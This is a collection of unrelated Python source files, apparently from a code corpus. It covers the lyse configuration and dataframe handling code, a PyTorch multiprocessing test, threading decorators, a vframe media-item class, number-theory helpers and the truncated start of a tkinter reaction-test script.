self.ui.splitter_horizontal.setSizes([1000, 600])
self.ui.splitter_vertical.setSizes([300, 600])
# autoload a config file, if labconfig is set to do so:
try:
autoload_config_file = self.exp_config.get('lyse', 'autoload_config_file')
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
self.output_box.output('Ready.\n\n')
else:
self.ui.setEnabled(False)
self.output_box.output('Loading default config file %s...' % autoload_config_file)
def load_the_config_file():
try:
self.load_configuration(autoload_config_file, restore_window_geometry)
self.output_box.output('done.\n')
except Exception as e:
self.output_box.output('\nCould not load config file: %s: %s\n\n' %
(e.__class__.__name__, str(e)), red=True)
else:
self.output_box.output('Ready.\n\n')
finally:
self.ui.setEnabled(True)
# Load the window geometry now, but then defer the other loading until 50ms
# after the window has shown, so that the GUI pops up faster in the meantime.
try:
self.load_window_geometry_configuration(autoload_config_file)
except Exception:
# ignore error for now and let it be raised again in the call to load_configuration:
restore_window_geometry = True
else:
# Success - skip loading window geometry in load_configuration:
restore_window_geometry = False
self.ui.firstPaint.connect(lambda: QtCore.QTimer.singleShot(50, load_the_config_file))
self.ui.show()
# self.ui.showMaximized()
def terminate_all_workers(self):
for routine in self.singleshot_routinebox.routines + self.multishot_routinebox.routines:
routine.end_child()
def workers_terminated(self):
terminated = {}
for routine in self.singleshot_routinebox.routines + self.multishot_routinebox.routines:
routine.worker.poll()
terminated[routine.filepath] = routine.worker.returncode is not None
return terminated
def are_you_sure(self):
message = ('Current configuration (which scripts are loaded and other GUI state) '
'has changed: save config file \'%s\'?' % self.last_save_config_file)
reply = QtWidgets.QMessageBox.question(self.ui, 'Quit lyse', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No | QtWidgets.QMessageBox.Cancel)
if reply == QtWidgets.QMessageBox.Cancel:
return False
if reply == QtWidgets.QMessageBox.Yes:
self.save_configuration(self.last_save_config_file)
return True
def on_close_event(self):
save_data = self.get_save_data()
if self.last_save_data is not None and save_data != self.last_save_data:
if self.only_window_geometry_is_different(save_data, self.last_save_data):
self.save_configuration(self.last_save_config_file)
self.terminate_all_workers()
return True
elif not self.are_you_sure():
return False
self.terminate_all_workers()
return True
def on_save_configuration_triggered(self):
if self.last_save_config_file is None:
self.on_save_configuration_as_triggered()
self.ui.actionSave_configuration_as.setEnabled(True)
self.ui.actionRevert_configuration.setEnabled(True)
else:
self.save_configuration(self.last_save_config_file)
def on_revert_configuration_triggered(self):
save_data = self.get_save_data()
if self.last_save_data is not None and save_data != self.last_save_data:
message = 'Revert configuration to the last saved state in \'%s\'?' % self.last_save_config_file
reply = QtWidgets.QMessageBox.question(self.ui, 'Load configuration', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.Cancel)
if reply == QtWidgets.QMessageBox.Cancel:
return
elif reply == QtWidgets.QMessageBox.Yes:
self.load_configuration(self.last_save_config_file)
else:
error_dialog('no changes to revert')
def on_save_configuration_as_triggered(self):
if self.last_save_config_file is not None:
default = self.last_save_config_file
else:
try:
default_path = os.path.join(self.exp_config.get('DEFAULT', 'app_saved_configs'), 'lyse')
except LabConfig.NoOptionError:
self.exp_config.set('DEFAULT', 'app_saved_configs', os.path.join('%(labscript_suite)s', 'userlib', 'app_saved_configs', '%(experiment_name)s'))
default_path = os.path.join(self.exp_config.get('DEFAULT', 'app_saved_configs'), 'lyse')
if not os.path.exists(default_path):
os.makedirs(default_path)
default = os.path.join(default_path, 'lyse.ini')
save_file = QtWidgets.QFileDialog.getSaveFileName(self.ui,
'Select file to save current lyse configuration',
default,
"config files (*.ini)")
if type(save_file) is tuple:
save_file, _ = save_file
if not save_file:
# User cancelled
return
# Convert to standard platform specific path, otherwise Qt likes
# forward slashes:
save_file = os.path.abspath(save_file)
self.save_configuration(save_file)
def only_window_geometry_is_different(self, current_data, old_data):
ui_keys = ['window_size', 'window_pos', 'splitter', 'splitter_vertical', 'splitter_horizontal']
compare = [current_data[key] == old_data[key] for key in current_data.keys() if key not in ui_keys]
return all(compare)
def get_save_data(self):
save_data = {}
box = self.singleshot_routinebox
save_data['SingleShot'] = list(zip([routine.filepath for routine in box.routines],
[box.model.item(row, box.COL_ACTIVE).checkState()
for row in range(box.model.rowCount())]))
save_data['LastSingleShotFolder'] = box.last_opened_routine_folder
box = self.multishot_routinebox
save_data['MultiShot'] = list(zip([routine.filepath for routine in box.routines],
[box.model.item(row, box.COL_ACTIVE).checkState()
for row in range(box.model.rowCount())]))
save_data['LastMultiShotFolder'] = box.last_opened_routine_folder
save_data['LastFileBoxFolder'] = self.filebox.last_opened_shots_folder
save_data['analysis_paused'] = self.filebox.analysis_paused
window_size = self.ui.size()
save_data['window_size'] = (window_size.width(), window_size.height())
window_pos = self.ui.pos()
save_data['window_pos'] = (window_pos.x(), window_pos.y())
save_data['screen_geometry'] = get_screen_geometry()
save_data['splitter'] = self.ui.splitter.sizes()
save_data['splitter_vertical'] = self.ui.splitter_vertical.sizes()
save_data['splitter_horizontal'] = self.ui.splitter_horizontal.sizes()
return save_data
def save_configuration(self, save_file):
lyse_config = LabConfig(save_file)
save_data = self.get_save_data()
self.last_save_config_file = save_file
self.last_save_data = save_data
for key, value in save_data.items():
lyse_config.set('lyse_state', key, pprint.pformat(value))
def on_load_configuration_triggered(self):
save_data = self.get_save_data()
if self.last_save_data is not None and save_data != self.last_save_data:
message = ('Current configuration (which groups are active/open and other GUI state) '
'has changed: save config file \'%s\'?' % self.last_save_config_file)
reply = QtWidgets.QMessageBox.question(self.ui, 'Load configuration', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No | QtWidgets.QMessageBox.Cancel)
if reply == QtWidgets.QMessageBox.Cancel:
return
if reply == QtWidgets.QMessageBox.Yes:
self.save_configuration(self.last_save_config_file)
if self.last_save_config_file is not None:
default = self.last_save_config_file
else:
default = os.path.join(self.exp_config.get('paths', 'experiment_shot_storage'), 'lyse.ini')
file = QtWidgets.QFileDialog.getOpenFileName(self.ui,
'Select lyse configuration file to load',
default,
"config files (*.ini)")
if type(file) is tuple:
file, _ = file
if not file:
# User cancelled
return
# Convert to standard platform specific path, otherwise Qt likes
# forward slashes:
file = os.path.abspath(file)
self.load_configuration(file)
def load_configuration(self, filename, restore_window_geometry=True):
self.last_save_config_file = filename
self.ui.actionSave_configuration.setText('Save configuration %s' % filename)
lyse_config = LabConfig(filename)
try:
self.singleshot_routinebox.add_routines(ast.literal_eval(lyse_config.get('lyse_state', 'SingleShot')), clear_existing=True)
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.singleshot_routinebox.last_opened_routine_folder = ast.literal_eval(lyse_config.get('lyse_state', 'LastSingleShotFolder'))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.multishot_routinebox.add_routines(ast.literal_eval(lyse_config.get('lyse_state', 'MultiShot')), clear_existing=True)
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.multishot_routinebox.last_opened_routine_folder = ast.literal_eval(lyse_config.get('lyse_state', 'LastMultiShotFolder'))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.filebox.last_opened_shots_folder = ast.literal_eval(lyse_config.get('lyse_state', 'LastFileBoxFolder'))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
if ast.literal_eval(lyse_config.get('lyse_state', 'analysis_paused')):
self.filebox.pause_analysis()
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
if restore_window_geometry:
self.load_window_geometry_configuration(filename)
# Set as self.last_save_data:
save_data = self.get_save_data()
self.last_save_data = save_data
self.ui.actionSave_configuration_as.setEnabled(True)
self.ui.actionRevert_configuration.setEnabled(True)
def load_window_geometry_configuration(self, filename):
"""Load only the window geometry from the config file. It's useful to have this
separate from the rest of load_configuration so that it can be called before the
window is shown."""
lyse_config = LabConfig(filename)
try:
screen_geometry = ast.literal_eval(lyse_config.get('lyse_state', 'screen_geometry'))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
else:
# Only restore the window size and position, and splitter
# positions if the screen is the same size/same number of monitors
# etc. This prevents the window moving off the screen if say, the
# position was saved when 2 monitors were plugged in but there is
# only one now, and the splitters may not make sense in light of a
# different window size, so better to fall back to defaults:
current_screen_geometry = get_screen_geometry()
if current_screen_geometry == screen_geometry:
try:
self.ui.resize(*ast.literal_eval(lyse_config.get('lyse_state', 'window_size')))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.ui.move(*ast.literal_eval(lyse_config.get('lyse_state', 'window_pos')))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.ui.splitter.setSizes(ast.literal_eval(lyse_config.get('lyse_state', 'splitter')))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.ui.splitter_vertical.setSizes(ast.literal_eval(lyse_config.get('lyse_state', 'splitter_vertical')))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.ui.splitter_horizontal.setSizes(ast.literal_eval(lyse_config.get('lyse_state', 'splitter_horizontal')))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
def setup_config(self):
required_config_params = {"DEFAULT": ["experiment_name"],
"programs": ["text_editor",
"text_editor_arguments",
"hdf5_viewer",
"hdf5_viewer_arguments"],
"paths": ["shared_drive",
"experiment_shot_storage",
"analysislib"],
"ports": ["lyse"]
}
self.exp_config = LabConfig(required_params=required_config_params)
def connect_signals(self):
if os.name == 'nt':
self.ui.newWindow.connect(set_win_appusermodel)
# Keyboard shortcuts:
QtWidgets.QShortcut('Del', self.ui, lambda: self.delete_items(True))
QtWidgets.QShortcut('Shift+Del', self.ui, lambda: self.delete_items(False))
def on_save_dataframe_triggered(self, choose_folder=True):
df = self.filebox.shots_model.dataframe.copy()
if len(df) > 0:
default = self.exp_config.get('paths', 'experiment_shot_storage')
if choose_folder:
save_path = QtWidgets.QFileDialog.getExistingDirectory(self.ui, 'Select a Folder for the Dataframes', default)
if type(save_path) is tuple:
save_path, _ = save_path
if not save_path:
# User cancelled
return
sequences = df.sequence.unique()
for sequence in sequences:
sequence_df = pandas.DataFrame(df[df['sequence'] == sequence], columns=df.columns).dropna(axis=1, how='all')
labscript = sequence_df['labscript'].iloc[0]
filename = "dataframe_{}_{}.msg".format(sequence.to_pydatetime().strftime("%Y%m%dT%H%M%S"),labscript[:-3])
if not choose_folder:
save_path = os.path.dirname(sequence_df['filepath'].iloc[0])
                sequence_df = sequence_df.infer_objects()
                for col in sequence_df.columns:
                    if sequence_df[col].dtype == object:
                        sequence_df[col] = pandas.to_numeric(sequence_df[col], errors='ignore')
sequence_df.to_msgpack(os.path.join(save_path, filename))
else:
error_dialog('Dataframe is empty')
def on_load_dataframe_triggered(self):
default = os.path.join(self.exp_config.get('paths', 'experiment_shot_storage'), 'dataframe.msg')
file = QtWidgets.QFileDialog.getOpenFileName(self.ui,
'Select dataframe file to load',
default,
"dataframe files (*.msg)")
if type(file) is tuple:
file, _ = file
if not file:
# User cancelled
return
# Convert to standard platform specific path, otherwise Qt likes
# forward slashes:
file = os.path.abspath(file)
df = pandas.read_msgpack(file).sort_values("run time").reset_index()
# Check for changes in the shot files since the dataframe was exported
def changed_since(filepath, time):
if os.path.isfile(filepath):
return os.path.getmtime(filepath) > time
else:
return False
filepaths = df["filepath"].tolist()
changetime_cache = os.path.getmtime(file)
        need_updating = np.where([changed_since(fp, changetime_cache) for fp in filepaths])[0]
        need_updating = np.sort(need_updating)[::-1]  # sort in descending order so pop does not remove the wrong items
        # Reload the files where changes were made since exporting
for index in need_updating:
filepath = filepaths.pop(index)
self.filebox.incoming_queue.put(filepath)
df = df.drop(need_updating)
self.filebox.shots_model.add_files(filepaths, df, done=True)
def delete_items(self, confirm):
"""Delete items from whichever box has focus, with optional confirmation
dialog"""
if self.filebox.ui.tableView.hasFocus():
self.filebox.shots_model.remove_selection(confirm)
if self.singleshot_routinebox.ui.treeView.hasFocus():
self.singleshot_routinebox.remove_selection(confirm)
if self.multishot_routinebox.ui.treeView.hasFocus():
self.multishot_routinebox.remove_selection(confirm)
if __name__ == "__main__":
logger = setup_logging('lyse')
labscript_utils.excepthook.set_logger(logger)
logger.info('\n\n===============starting===============\n')
qapplication = QtWidgets.QApplication(sys.argv)
qapplication.setAttribute(QtCore.Qt.AA_DontShowIconsInMenus, False)
app = Lyse()
# Start the web server:
splash.update_text('starting analysis server')
server = WebServer(app.port)
splash.update_text('done')
# Let the interpreter run every 500ms so it sees Ctrl-C interrupts:
timer = QtCore.QTimer()
timer.start(500)
timer.timeout.connect(lambda: None) # Let the interpreter run each 500 ms.
# Upon seeing a ctrl-c interrupt, quit the event loop
signal.signal(signal.SIGINT, lambda *args: qapplication.exit())
splash.hide()
qapplication.exec_()
server.shutdown()
|
test_pytorch_multiprocessing.py
|
# Future
from __future__ import print_function
# Standard Library
import os
import shutil
# Third Party
import torch
import torch.multiprocessing as mp
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from tests.zero_code_change.utils import build_json
from torchvision import datasets, transforms
# First Party
from smdebug.trials import create_trial
data_dir = "/tmp/pytorch-mnist-data"
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(1, 10, kernel_size=5)
self.conv2 = nn.Conv2d(10, 20, kernel_size=5)
self.conv2_drop = nn.Dropout2d()
self.fc1 = nn.Linear(320, 50)
self.fc2 = nn.Linear(50, 10)
def forward(self, x):
x = F.relu(F.max_pool2d(self.conv1(x), 2))
x = F.relu(F.max_pool2d(self.conv2_drop(self.conv2(x)), 2))
x = x.view(-1, 320)
x = F.relu(self.fc1(x))
x = F.dropout(x, training=self.training)
x = self.fc2(x)
return F.log_softmax(x, dim=1)
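# Shape check for the flatten in forward (MNIST inputs are 1x28x28): conv1's
# 5x5 kernel gives 24x24, max-pooling halves it to 12x12; conv2 gives 8x8,
# pooled to 4x4; with 20 channels that is 20 * 4 * 4 = 320, matching
# x.view(-1, 320) and nn.Linear(320, 50).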
def train(rank, model, device, dataloader_kwargs):
# Training Settings
batch_size = 64
epochs = 1
lr = 0.01
momentum = 0.5
torch.manual_seed(1 + rank)
train_loader = torch.utils.data.DataLoader(
datasets.MNIST(
data_dir,
train=True,
download=True,
transform=transforms.Compose(
[transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))]
),
),
batch_size=batch_size,
shuffle=True,
num_workers=1,
**dataloader_kwargs
)
optimizer = optim.SGD(model.parameters(), lr=lr, momentum=momentum)
for epoch in range(1, epochs + 1):
train_epoch(epoch, model, device, train_loader, optimizer)
def train_epoch(epoch, model, device, data_loader, optimizer):
model.train()
for batch_idx, (data, target) in enumerate(data_loader):
if batch_idx > 4:
break
optimizer.zero_grad()
output = model(data.to(device))
loss = F.nll_loss(output, target.to(device))
loss.backward()
optimizer.step()
def test_no_failure_with_torch_mp(out_dir):
shutil.rmtree(out_dir, ignore_errors=True)
path = build_json(out_dir, save_all=True, save_interval="1")
path = str(path)
os.environ["SMDEBUG_CONFIG_FILE_PATH"] = path
device = "cpu"
dataloader_kwargs = {}
cpu_count = 2 if mp.cpu_count() > 2 else mp.cpu_count()
torch.manual_seed(1)
model = Net().to(device)
model.share_memory() # gradients are allocated lazily, so they are not shared here
processes = []
for rank in range(cpu_count):
p = mp.Process(target=train, args=(rank, model, device, dataloader_kwargs))
# We first train the model across `num_processes` processes
p.start()
processes.append(p)
for p in processes:
p.join()
trial = create_trial(out_dir)
assert trial.num_workers == 1 # Ensure only one worker saved data
assert len(trial.tensor_names()) > 20 # Ensure that data was saved
assert trial.steps() == [0, 1, 2, 3] # Ensure that steps were saved
shutil.rmtree(out_dir, ignore_errors=True)
shutil.rmtree(data_dir, ignore_errors=True)
|
threaded.py
|
# This program is public domain
# Author: Paul Kienzle
"""
Thread and daemon decorators.
See :function:`threaded` and :function:`daemon` for details.
"""
from functools import wraps
import itertools
import threading
#TODO: fix race conditions
# notify may be called twice in after()
# 1. main program calls fn() which starts the processing and returns job
# 2. main program calls job.after(notify)
# 3. after() suspends when __after is set but before __stopped is checked
# 4. thread ends, setting __stopped and calling __after(result)
# 5. main resumes, calling __after(result) since __stopped is now set
# solution is to use thread locks when testing/setting __after.
_after_lock = threading.Lock()
class AfterThread(threading.Thread):
"""
Thread class with additional 'after' capability which runs a function
after the thread is complete. This allows us to separate the notification
from the computation.
Unlike Thread.join, the wait() method returns the value of the computation.
"""
name = property(threading.Thread.getName,
threading.Thread.setName,
doc="Thread name")
def __init__(self, *args, **kwargs):
self.__result = None
self.__after = kwargs.pop('after',None)
threading.Thread.__init__(self, *args, **kwargs)
def after(self, notify=None):
"""
Calls notify after the thread is complete. Notify should
take a single argument which is the result of the function.
Note that notify will be called from the main thread if the
thread is already complete when thread.after(notify) is called,
otherwise it will be called from thread.
"""
_after_lock.acquire()
self.__after = notify
        # Run immediately if thread is already complete (checked via the
        # Python 3 threading.Thread API):
        if self._started.is_set() and not self.is_alive():
post = notify
else:
post = lambda x: x
_after_lock.release()
post(self.__result)
def run(self):
"""
Run the thread followed by the after function if any.
"""
        if self._target:
            self.__result = self._target(*self._args, **self._kwargs)
_after_lock.acquire()
if self.__after is not None:
post = self.__after
else:
post = lambda x: x
_after_lock.release()
post(self.__result)
def wait(self, timeout=None):
"""
Wait for the thread to complete.
Returns the result of the computation.
Example::
result = thread.wait()
If timeout is used, then wait() may return before the result is
available. In this case, wait() will return None. This can be
used as follows::
while True:
result = thread.wait(timeout=0)
if result is not None: break
... do something else while waiting ...
Timeout should not be used with functions that may return None.
This is due to the race condition in which the thread completes
between the timeout triggering in wait() and the main thread
calling thread.isAlive().
"""
self.join(timeout)
return self.__result
def threaded(fn):
"""
@threaded decorator for functions to be run in a thread.
Returns the running thread.
The returned thread supports the following methods::
wait(timeout=False)
Waits for the function to complete.
Returns the result of the function if the thread is joined,
or None if timeout. Use thread.isAlive() to test for timeout.
after(notify)
Calls notify after the thread is complete. Notify should
take a single argument which is the result of the function.
isAlive()
Returns True if thread is still running.
name
Thread name property. By default the name is 'fn-#' where fn
is the function name and # is the number of times the thread
has been invoked.
For example::
@threaded
def compute(self,input):
...
def onComputeButton(self,evt):
thread = self.compute(self.input.GetValue())
thread.after(lambda result: wx.Post(self.win,wx.EVT_PAINT))
A threaded function can also be invoked directly in the current thread::
result = self.compute.main(self.input.GetValue())
    All threads must complete before the program can exit. For
    queue-processing threads which remain alive continuously waiting for
    new input, use the @daemon decorator instead.
"""
instance = itertools.count(1)
@wraps(fn)
def wrapper(*args, **kw):
name = "%s-%d"%(fn.__name__,next(instance))
thread = AfterThread(target=fn,args=args,kwargs=kw,name=name)
thread.start()
return thread
wrapper.main = fn
return wrapper
def daemon(fn):
"""
@daemon decorator for functions to be run in a thread.
Returns the running thread.
Unlike threaded functions, daemon functions are not expected to complete.
"""
instance_counter = itertools.count(1)
@wraps(fn)
def wrapper(*args, **kw):
name = "%s-%d"%(fn.__name__,next(instance_counter))
thread = threading.Thread(target=fn,args=args,kwargs=kw,name=name)
thread.setDaemon(True)
thread.start()
return thread
wrapper.main = fn
return wrapper
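# Illustrative usage sketch (not part of the original module; the ticker
# function below is made up for demonstration):
if __name__ == '__main__':
    import time
    @daemon
    def ticker(label):
        while True:
            print(label)
            time.sleep(0.5)
    thread = ticker('tick')  # returns the already-running daemon thread
    time.sleep(1.6)  # a few ticks print, then main exits and the daemon dies with it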
|
chair_item.py
|
"""Object that passes through the chair/click pipeline"""
from os.path import join
from threading import Thread
import cv2 as cv
from imutils.video import FileVideoStream
from vframe.settings import types
from vframe.settings import vframe_cfg as cfg
from vframe.models.media_item import MediaRecordItem
from vframe.utils import logger_utils, file_utils, im_utils
import numpy as np
class ChairItem(object):
_chair_type = None
def __init__(self, ctx):
"""Items that pass through the chair pipeline"""
self._ctx = ctx
self._keyframes = {}
self._drawframes = {}
self._media_record = None
self.log = logger_utils.Logger.getLogger()
def purge_metadata(self):
"""Purge data to free up RAM"""
self._keyframes = {}
self._drawframes = {}
self._media_record = None
def set_keyframes(self, frames, add_drawframe=False):
"""Adds dict of keyframe images"""
self._keyframes = frames
if add_drawframe:
# deep copy frames
self._drawframes = {}
for frame_idx, frame in frames.items():
self._drawframes[frame_idx] = frame.copy()
def remove_keyframes(self):
self._keyframes = {}
def set_drawframes(self, frames):
"""Adds dict of keyframe images"""
self._drawframes = frames
def remove_drawframes(self):
self._drawframes = {}
# shortcuts
def get_metadata(self, metadata_type):
"""Gets metadata dict if it exists. Returns empty dict if none"""
return self._media_record.get_metadata(metadata_type)
def set_metadata(self, metadata_type, metadata):
self._media_record.set_metadata(metadata_type, metadata)
@property
def keyframes(self):
return self._keyframes
    def keyframe(self, frame_idx):
        """Returns the keyframe image for frame_idx if it exists, else None"""
        return self._keyframes.get(frame_idx, None)
@property
def drawframes(self):
return self._drawframes
    def drawframe(self, frame_idx):
        """Returns the drawframe image for frame_idx if it exists, else None"""
        return self._drawframes.get(frame_idx, None)
@property
def ctx(self):
return self._ctx
@property
def chair_type(self):
return self._chair_type
@property
def media_format(self):
"""alternate name for same data"""
return self._media_record.media_format
def load_images(self):
        # overridden by subclasses
pass
class VideoKeyframeChairItem(ChairItem):
chair_type = types.ChairItemType.VIDEO_KEYFRAME
    def __init__(self, ctx, frame, frame_idx):
        super().__init__(ctx)
        self._frame = frame
        self._frame_idx = frame_idx
        #self._keyframes = {frame_idx: self._frame}
mr = MediaRecordItem(0, types.MediaFormat.VIDEO, 0, metadata={})
self._media_record = mr
def remove_frames(self):
self.remove_frame()
self.remove_drawframe()
def remove_frame(self):
self._frame = None
def remove_drawframe(self):
self._drawframe = None
def load_images(self, opt_size_type, opt_drawframes=False):
"""This is broken because images are already loaded"""
# eventually move this into VideoChairItem
# temporary fix for testing:
self.set_keyframes({0: self._frame}, opt_drawframes)
@property
def frame(self):
return self._frame
@property
def drawframe(self):
return self._drawframe
class PhotoChairItem(ChairItem):
chair_type = types.ChairItemType.PHOTO
def __init__(self, ctx, fp_image):
super().__init__(ctx)
self._ctx = ctx
self._fp_image = fp_image
mr = MediaRecordItem(0, types.MediaFormat.PHOTO, 0, metadata={})
self._media_record = mr
def load_images(self, fp_image, opt_size_type, opt_drawframes=False):
# append metadata to chair_item's mapping item
opt_size = cfg.IMAGE_SIZES[opt_size_type]
im = im_utils.resize(cv.imread(self._fp_image), width=opt_size)
self.set_keyframes({0: im}, opt_drawframes)
class _x_VideoChairItem(ChairItem):
# CURRENTLY NOT IN USE
chair_type = types.ChairItemType.VIDEO
def __init__(self, ctx, fp_video):
super().__init__(ctx)
self._fp_video = fp_video
self._stream = None
self._frame_count = 0
self._width = 0
self._height = 0
self._fps = 0
self._mspf = 0
self._last_display_ms = 0
mr = MediaRecordItem(0, types.MediaFormat.VIDEO, 0, metadata={})
self._media_record = mr
def load_images(self, opt_size_type, opt_drawframes=False):
"""Loads keyframes from video"""
self.log.debug('init load_video_keyframes')
self._opt_drawframes = opt_drawframes
self._frame_width = cfg.IMAGE_SIZES[opt_size_type]
self.log.debug('load: {}'.format(self._fp_video))
# self._filevideostream = FileVideoStream(self._fp_video, transform=None, queueSize=256)
# self._filevideostream.start()
self.log.debug('filevideostream started')
self._stream = cv.VideoCapture(self._fp_video)
# _stream = self._filevideostream.stream
self._frame_count = int(self._stream.get(cv.CAP_PROP_FRAME_COUNT))
self._width = int(self._stream.get(cv.CAP_PROP_FRAME_WIDTH))
self._height = int(self._stream.get(cv.CAP_PROP_FRAME_HEIGHT))
self._fps = self._stream.get(cv.CAP_PROP_FPS)
self._mspf = int(1 / self._fps * 1000) # milliseconds per frame
self.log.debug('frame_count: {}'.format(self._frame_count))
self._stream.release()
im_blank = np.zeros([720, 1280, 3],dtype=np.uint8)
for i in range(self._frame_count):
self._keyframes[i] = im_blank.copy()
self._drawframes[i] = im_blank.copy()
self.log.debug('start load thread')
# make threaded
self.load_thread = Thread(target=self.update_thread, args=())
self.load_thread.daemon = True
self.log.debug('really start load thread')
        try:
            self.load_thread.start()
        except Exception as ex:
            self.log.error('{}'.format(ex))
def update_thread(self):
self._stream = cv.VideoCapture(self._fp_video)
valid, frame = self._stream.read()
self.log.debug('size: {}'.format(frame.shape))
self.log.debug('init update_thread')
frame_idx = 0
while True:
valid, frame = self._stream.read()
if not valid:
self._stream.release()
break
frame = im_utils.resize(frame, width=self._frame_width)
self._keyframes[frame_idx] = frame
if self._opt_drawframes:
self._drawframes[frame_idx] = frame.copy() # make drawable copy
frame_idx += 1
@property
def last_display_ms(self):
return self._last_display_ms
@last_display_ms.setter
def last_display_ms(self, value):
self._last_display_ms = value
@property
def mspf(self):
return self._mspf
@property
def width(self):
return self._width
@property
def height(self):
return self._height
@property
def fps(self):
return self._fps
@property
def frame_count(self):
return self._frame_count
@property
def filevideostream(self):
return self._filevideostream
@property
def drawframe(self):
return self._drawframe
class MediaRecordChairItem(ChairItem):
chair_type = types.ChairItemType.MEDIA_RECORD
def __init__(self, ctx, media_record):
super().__init__(ctx)
self._media_record = media_record
self._sha256 = self._media_record.sha256
def load_images(self, dir_media, opt_size, opt_density, opt_drawframes=False):
sha256_tree = file_utils.sha256_tree(self._sha256)
dir_sha256 = join(dir_media, sha256_tree, self._sha256)
opt_size_label = cfg.IMAGE_SIZE_LABELS[opt_size]
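        # Assumed keyframe layout for the paths built below (sha256_tree
        # presumably nests directories derived from the hash):
        #   <dir_media>/<sha256 tree>/<sha256>/<zero-padded frame>/<size label>/index.jpg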
# get the keyframe status data to check if images available
try:
keyframe_status = self.get_metadata(types.Metadata.KEYFRAME_STATUS)
except Exception as ex:
self.log.error('no keyframe metadata. Try: "append -t keyframe_status"')
return
keyframes = {}
# if keyframe images were generated and exist locally
if keyframe_status and keyframe_status.get_status(opt_size):
keyframe_metadata = self.get_metadata(types.Metadata.KEYFRAME)
if not keyframe_metadata:
self.log.error('no keyframe metadata. Try: "append -t keyframe"')
return
# get keyframe indices
frame_idxs = keyframe_metadata.get_keyframes(opt_density)
for frame_idx in frame_idxs:
# get keyframe filepath
fp_keyframe = join(dir_sha256, file_utils.zpad(frame_idx), opt_size_label, 'index.jpg')
                im = cv.imread(fp_keyframe)
                if im is None:
                    # cv.imread returns None for missing or unreadable files
                    self.log.warn('file not found: {}'.format(fp_keyframe))
                    # don't add to keyframe dict
                    continue
                keyframes[frame_idx] = im
# append metadata to chair_item's mapping item
self.set_keyframes(keyframes, opt_drawframes)
@property
def sha256(self):
return self._sha256
@property
def verified(self):
return self._media_record.verified
@property
def media_record(self):
"""both refer to same data"""
return self._media_record
|
tests.py
|
import random
import multiprocessing
import time
def main1():
x = 14
y = 18
z = []
z = ExtendedEuclid(x,y,z)
    if z[0]:
        print('{} and {} are coprime; the multiplicative inverse is: {}\n'.format(x, y, z[1]))
    else:
        print('{} and {} are not coprime; their greatest common divisor is: {}\n'.format(x, y, z[1]))
return 0
def ExtendedEuclid(f, d , result):
# x1,x2,x3,y1,y2,y3,t1,t2,t3,q
x1 = 1
y2 = 1
x2 = 0
y1 = 0
if(f >= d):
x3 = f
y3 = d
else:
x3 = d
y3 = f
while True:
        if y3 == 0:
            result = x3  # not coprime: result is the gcd of the two numbers, and the flag returned is 0
            return 0, result
        if y3 == 1:
            result = y2  # coprime: result is the multiplicative inverse, and the flag returned is 1
            return 1, result
        q = x3 // y3  # integer quotient; '/' would produce a float in Python 3
t1 = x1 - q * y1
t2 = x2 - q * y2
t3 = x3 - q*y3
x1 = y1
x2 = y2
x3 = y3
y1 = t1
y2 = t2
y3 = t3
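# Worked example (cf. main1 above): ExtendedEuclid(14, 18, []) returns (0, 2)
# since gcd(14, 18) = 2, whereas ExtendedEuclid(7, 48, []) returns (1, 7)
# because 7 * 7 = 49 and 49 mod 48 == 1, i.e. 7 is its own inverse modulo 48.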
def egcd(a, b):
if b == 0:
return a, 1, 0
else:
g, x, y = egcd(b, a % b)
        return g, y, x - (a // b) * y
def modPow(a, b, m):
v = 1
p = a % m
b = int(b)
while(b > 0):
if (b & 1) != 0:
v = (v * p) % m
p = (p * p) % m
b >>= 1
return v
def witness(a, n):
    n1 = n - 1
    s2 = n1 & -n1  # largest power of two dividing n - 1 (isolates the lowest set bit)
    x = modPow(a, n1 // s2, n)  # integer division keeps the exponent integral under Python 3
if x == 1 or x == n1:
return False
while (s2 > 1):
x = (x * x) % n
if x == 1:
return True
if x == n1:
return False
s2 >>= 1
return True
def probably_prime(n, k):
if n == 2 or n == 3:
return True
if n < 2 or n % 2 == 0:
return False
for i in range(k):
if witness(random.randint(1, n - 3) + 2, n):
return False
return True
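# Quick sanity check (added for illustration): Miller-Rabin rejects Carmichael
# numbers such as 561 = 3*11*17, which fool the plain Fermat test.
# print(probably_prime(561, 5), probably_prime(569, 5))  # expected: False True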
def aaa():
if probably_prime(607, 1):
print('YES')
else:
print('NO')
def output_number(number):
while True:
print(number)
time.sleep(1)
if __name__ == '__main__':
# main1()
#
# a = 7
# b = 48
# print(egcd(a, b))
t1 = multiprocessing.Process(target=output_number, args=(1,))
t2 = multiprocessing.Process(target=output_number, args=(2,))
t1.start()
t2.start()
|
test.py
|
#importing modules, all preinstalled normally
from threading import Thread
from tkinter import *
from random import randint
from time import sleep, time
"""
██████╗ ███████╗ █████╗ ██████╗████████╗██╗ ██████╗ ███╗ ██╗ ████████╗███████╗███████╗████████╗
██╔══██╗██╔════╝██╔══██╗██╔════╝╚══██╔══╝██║██╔═══██╗████╗ ██║ ╚══██╔══╝██╔════╝██╔════╝╚══██╔══╝
██████╔╝█████╗ ███████║██║ ██║ ██║██║ ██║██╔██╗ ██║█████╗██║ █████╗ ███████╗ ██║
██╔══██╗██╔══╝ ██╔══██║██║ ██║ ██║██║ ██║██║╚██╗██║╚════╝██║ ██╔══╝ ╚════██║ ██║
